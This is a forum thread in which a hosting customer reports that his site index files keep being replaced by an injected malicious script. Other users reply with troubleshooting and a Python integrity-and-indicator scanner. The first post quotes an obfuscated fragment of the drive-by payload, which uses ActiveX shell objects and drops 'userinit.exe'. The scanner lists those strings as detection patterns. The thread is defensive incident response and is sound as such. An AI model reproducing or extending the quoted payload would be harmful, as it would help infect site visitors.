I have to make the administrators aware of this as soon as possible. I thought it best to post here first as other users may be affected.

I have a bulletin board hosted with dreamhost and users started complaining of a blank page and Firefox just shutting down.

I was unable to check this out until this evening and noticed that a ‘Loading…’ text appeared in the top right then I was redirected to ‘_index.php’ instead of ‘index.php’.

On further investigation the original index.php has been replaced by a script which exploits users logging into the board. I thought it may be a vulnerability in vBulletin, which I use, but ALL index.html and index.php files on all domains and subdomains have been changed.

I replaced the original but they keep being replaced and the original renamed.

The header when viewing the source looks like this:

```javascript
cj=unescape("\");dr="c:"+cj+"Recycled"+cj;k=dr+"userinit.exe";try{g=new ActiveXObject("Scripting.FileSystemObject");v=new ActiveXObject("WScript.Shell");nx=1;if(g.FileExists(k)){ex=g.GetFile(k);if(ex.size>20000)nx=0;}function fl(){return false}document.oncontextmenu
```

When viewing the file downloaded from the server it is all encrypted. PLEASE HELP. I have had to block access to all my sites.


Contact support ASAP… they are the ones that must get the message first, and this forum is not the fastest way… post a ticket with support as an emergency site down or security issue…
Fast ;D


I posted a ticket as soon as I had hit post here.

I hope this isn’t server wide as a lot of users could be infected just by viewing the index.


Which DreamHost server are you on?


The chances are good that it was a security flaw in your bulletin board software that was exploited rather than a server-wide exploit. While you’re waiting to hear back from support, I’d definitely check to see if there have been any updates to the software you’re using.


I have checked vBulletin and there is nothing that could be exploited in this way.

The thing is it’s not just the index.php of the board; it’s the index.php in the AdminCP and in all other folders of the domains I host there. All have been replaced.

This is the code: http://pastebin.com/578958

The server is Atlantic. I emailed support last night and I have had no reply, what the hell are they doing?

This is urgent - anybody that visits any of my sites is under the threat of being hacked by this code.


If files on your other sites have been modified as well, the exploit could be in any code you’re running, not just Vbulletin. Look at everything you’ve installed or written.

If the modified files are being replaced after you remove them, something is doing it, probably from a cron job running every minute or some such. Find this first, then remove the modified files.

In the meantime, to protect your IE-using visitors, disable your site completely. Password protect them from the panel or add this to .htaccess in the root directory of all your sites:

```apache
Order deny,allow
Deny from all
```
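A concrete way to do the "find the modified files first" step above, and to look for the injected header quoted in the first post, is a baseline-and-verify check over the web root. The script below is an added example written for this thread; it is not the poster's code, DreamHost's, or vBulletin's. It hashes every file under a directory into a manifest, later reports files that changed, vanished or appeared, scans text-like files for the indicator strings visible in the quoted header (`ActiveXObject("Scripting.FileSystemObject")`, `ActiveXObject("WScript.Shell")`, `userinit.exe`), and flags the file names the poster reported (`a.asp`, `a.html`, `a.php`, and originals renamed to `_index.*`). The indicator list and the dropped-file names are taken from this thread and are assumptions about what a given infection looks like; extend them for anything else you find.

```python
import hashlib
from pathlib import Path

# Indicator strings lifted from the injected header quoted in the thread
# (assumed to be stable markers of this particular injection).
INDICATORS = (
    'ActiveXObject("Scripting.FileSystemObject")',
    'ActiveXObject("WScript.Shell")',
    "userinit.exe",
)

# File names the poster reported appearing next to the renamed originals.
DROPPED_NAMES = {"a.asp", "a.html", "a.php"}

# Extensions worth opening as text when looking for the injected script.
TEXT_EXT = {".php", ".html", ".htm", ".js", ".asp"}


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map every file under root (relative POSIX path) to its SHA-256 hex digest."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): sha256_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def verify(root, manifest):
    """Compare the tree under root against a manifest taken when it was clean."""
    current = build_manifest(root)
    return {
        "modified": sorted(k for k in manifest if k in current and current[k] != manifest[k]),
        "missing": sorted(k for k in manifest if k not in current),
        "new": sorted(k for k in current if k not in manifest),
    }


def scan_indicators(root):
    """Return {relpath: [indicators found]} for text-like files that contain any indicator."""
    root = Path(root)
    hits = {}
    for p in sorted(root.rglob("*")):
        if not p.is_file() or p.suffix.lower() not in TEXT_EXT:
            continue
        text = p.read_bytes().decode("utf-8", errors="ignore")
        found = [s for s in INDICATORS if s in text]
        if found:
            hits[p.relative_to(root).as_posix()] = found
    return hits


def suspicious_names(root):
    """Files named like the dropped payloads or like a renamed original (_index.*)."""
    root = Path(root)
    return sorted(
        p.relative_to(root).as_posix()
        for p in root.rglob("*")
        if p.is_file() and (p.name in DROPPED_NAMES or p.name.startswith("_index."))
    )


def audit(root, manifest):
    """Full report: manifest diff plus indicator and file-name scans."""
    report = verify(root, manifest)
    report["indicators"] = scan_indicators(root)
    report["suspicious_names"] = suspicious_names(root)
    return report


if __name__ == "__main__":
    import json
    import sys
    # usage: script.py baseline WEBROOT > manifest.json
    #        script.py audit WEBROOT manifest.json
    cmd, root = sys.argv[1], sys.argv[2]
    if cmd == "baseline":
        json.dump(build_manifest(root), sys.stdout, indent=2)
    else:
        with open(sys.argv[3]) as f:
            manifest = json.load(f)
        json.dump(audit(root, manifest), sys.stdout, indent=2)
```

Take the baseline from a copy of the site you know is clean (or from a fresh upload, as the poster did with the "test" index files), keep the manifest somewhere the web account cannot write to, and run the audit from cron or by hand after each suspected rewrite. A modification time alone is not enough evidence, since whatever is rewriting the files can also reset timestamps; the hash comparison is what tells you content changed.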

OK, now this is constructive advice.

I have moved 5 domains over so far
2 are empty
2 are just an index.html + images (in folder)
1 is vBulletin

How would a cron job be able to change the pages in all the other domain folders? And if it could, how would I find out where this is set?


OK, this is just slightly annoying as the response from the Support department was nothing more than ‘Sorry, this is your problem’.

These are the measures I have taken:
~Deleted ALL files/boards from all the domains (Everything)
~Changed all FTP accounts to random passwords (confirmation emails haven’t even been opened)
~Applied .htaccess to all Domains/folders
~uploaded a text file in each folder containing the word test and renamed to index.html or index.php

At 06:03 server time all index files were renamed, the usual files appeared (a.asp, a.html, a.php), and the ‘test’ index file I left was renamed to _index.php/html.



If it’s only affecting you, then it’s your account that’s been compromised, not the entire server.

Did you check your cronjobs?

```
[atlantic]$ crontab -l
no crontab for virtualburn
```


If you are using Version 3.5.4 (released Feb. 21, 06) and if your board is modded you may want to make sure you have the latest mod/hack(s).

If not (and you know that you have no other scripts running on your site,) you may want to post your question over in the VBulletin forum.


If you took the time to read the previous post you would know that this is not a vBulletin issue, this is what the Support said it could be.

I have NO FILES on the server apart from a fake index page.

There are no Cronjobs

All FTP passes have been changed

All dirs have .htaccess set

There is no physical way anybody can get into the server

There are no files present on the server capable of being exploited

All fake index pages were replaced at the same time.

Somebody must have an idea of how this is happening; if there are no files on the domains to exploit then it has to be something on the server that is doing this.

I have no idea what to do, I have taken all security measures that the admin panel allows me to, now it is down to the DH admins to check that the server is not infected.


I have taken all security measures that the admin panel allows me to

This may seem obvious, but the obvious things are often overlooked: Have you changed your FTP/SSH password? (and the passwords of any other accounts you’ve given access to, if any)

Christ almighty, does anybody read…

“…All FTP passes have been changed…”

The FTP passes are the same for SSH access.

My hosting may as well be locked down; everything is secured, there is nothing on site.


Sounds like a virus or worm heh… did you resend a ticket to support?


Forgive me for skimming at this point. Mea culpa.

The fact remains: If DreamHost support says it’s your problem, it must not be affecting anyone else on your server. Ergo, your account must be compromised somehow. That said, at this point I’d write back to support (remain calm!) and explain things thoroughly, pointing them to this thread as well as providing a detailed explanation of what’s happening and what you’ve done about it. Politely asking for help will get you much better results than shouting about compromised servers and such.

It’s probably just someone messing with you because you’re a jerk. Try being less of a jerk.

If it’s only affecting your account (not the whole server) then it would seem that either a) someone has root access to the whole server, but they decided to just mess with a few of your index files, or b) there’s something you’re missing.

Maybe someone put a key logger on your computer and they know your new passwords as soon as you change them.

I have never received a “that’s your problem” type of response from support, so if you did something to trigger that, you might want to try again with a different approach.

You might think you’re smarter than the people that have tried to help you here, but we’re not the ones that can’t use our hosting accounts, are we?

Talk about hypocrisy. Ignore the jerk and keep us up to date on the situation. I would like to see how this is resolved (or not). I don’t feel like this is the work of a person… don’t think anyone is stupid (bored?) enough to mess with a completely empty website that has a fake index.html.


Yeah. He asks for help and replies with stuff like, “Christ all mighty does anybody read…” when people like kchrist are friendly and try to help him… so I must be the jerk.

Was it a dog? Cat? Because even if it’s a script, that’s the work of a person.

Why would someone, script or not, restrict their own access to a few of one person’s index files? If they have root access (doubt that), they’d do more. If they only have access to his account, then how is that a compromised server? It’s not.

Do you honestly think there is any chance that the server is compromised and DH’s reaction was, “that’s your problem”? Of course not. Or do you think it’s the whole server that got hit and he was the only one out of hundreds of users that noticed the damage?

And if it’s really just someone messing with him and his empty websites, script or not, then it’s possible that his own computer is what’s compromised and someone is getting his passwords as he changes them. Maybe they have his email password and/or NDN ID password. If that’s the case, they can just keep retrieving the new passwords as he creates them. There are plenty of things it can be besides a compromised server. Who knows?

Maybe no one here knows what the problem is, but neither does he, so he probably shouldn’t be giving the people that were trying to help him a hard time. That goes for support, too. I’ve never had a reply like the one he received, so that should pretty much show that his approach isn’t working.

